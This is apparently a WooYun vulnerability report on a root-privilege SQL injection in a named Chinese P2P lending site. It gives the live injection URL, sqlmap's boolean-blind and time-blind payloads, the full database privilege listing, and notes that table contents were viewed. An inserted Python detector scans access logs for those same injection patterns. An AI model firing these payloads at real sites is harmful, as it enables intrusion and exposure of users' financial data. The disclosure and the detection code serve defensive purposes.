2015-07-08: Actively contacting the vendor and awaiting vendor confirmation; details not disclosed publicly.
2015-08-22: The vendor has deliberately ignored the vulnerability; details disclosed to the public.
P2P finance security: root-privilege SQL injection in 紫枫信贷 (Zifeng Xindai), putting user data at serious risk
Injection point: http://www.zfxindai.cn/event/index/id/1.html
sqlmap output:

Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.zfxindai.cn:80/event/index/id/1) AND 9275=9275 AND (8214=8214.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.zfxindai.cn:80/event/index/id/1) AND SLEEP(5) AND (5803=5803.html
---
current user: 'root@%'
database management system users privileges:
[*] %root% (administrator) [26]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SUPER, TRIGGER, UPDATE
[*] %ucloudbackup% (administrator) [28]: ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TABLESPACE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE
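As an added defender-side example (not part of the original report): a small Python detector that scans web-server access logs for the two blind-injection shapes sqlmap reported above, a numeric tautology such as `AND 9275=9275` and a `SLEEP()` call in the request path. The log lines are constructed samples that reuse only the request paths from the report, with a documentation-range placeholder as the client IP.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not taken from the report). Requests 2 and 3
# carry the same path shapes as the sqlmap payloads; the client IP is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jul/2015:10:00:01 +0800] "GET /event/index/id/1.html HTTP/1.1" 200 5120
203.0.113.5 - - [08/Jul/2015:10:00:02 +0800] "GET /event/index/id/1)%20AND%209275=9275%20AND%20(8214=8214.html HTTP/1.1" 200 5120
203.0.113.5 - - [08/Jul/2015:10:00:03 +0800] "GET /event/index/id/1)%20AND%20SLEEP(5)%20AND%20(5803=5803.html HTTP/1.1" 200 5120
"""

# Common Log Format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Boolean-based blind: an injected tautology such as "AND 9275=9275" or "AND (8214=8214";
# the backreference requires both sides of "=" to be the same number.
TAUTOLOGY_RE = re.compile(r"\b(?:AND|OR)\s+\(?(\d+)\s*=\s*\1\b", re.IGNORECASE)
# Time-based blind: a MySQL delay primitive appearing in the request path.
TIME_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def classify_path(path):
    """Return the blind-injection techniques visible in one request path."""
    decoded = unquote(path)  # payloads arrive URL-encoded; match on the decoded form
    kinds = []
    if TAUTOLOGY_RE.search(decoded):
        kinds.append("boolean-blind")
    if TIME_RE.search(decoded):
        kinds.append("time-blind")
    return kinds


def scan_log(log_text):
    """Parse each log line and return an alert record for every suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        kinds = classify_path(m.group("path"))
        if kinds:
            alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                           "path": unquote(m.group("path")), "kinds": kinds})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["ip"], ",".join(alert["kinds"]), alert["path"])
```

Because the `id` value is part of the URL path here rather than a query string, the match is run on the whole decoded path so that path-routed parameters are covered too.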
163 tables; I did not dump them all. Part of the table list was shown (the published report masks the names).
A quick look at some of the contents (the column listing is likewise masked in the published report).
I don't dare do anything illegal, and I'd rather not get a knock on the door.
Could I get a high rank for this?
Vendor could not be reached, or the vendor actively declined.
Vulnerability rank: 15 (WooYun assessment)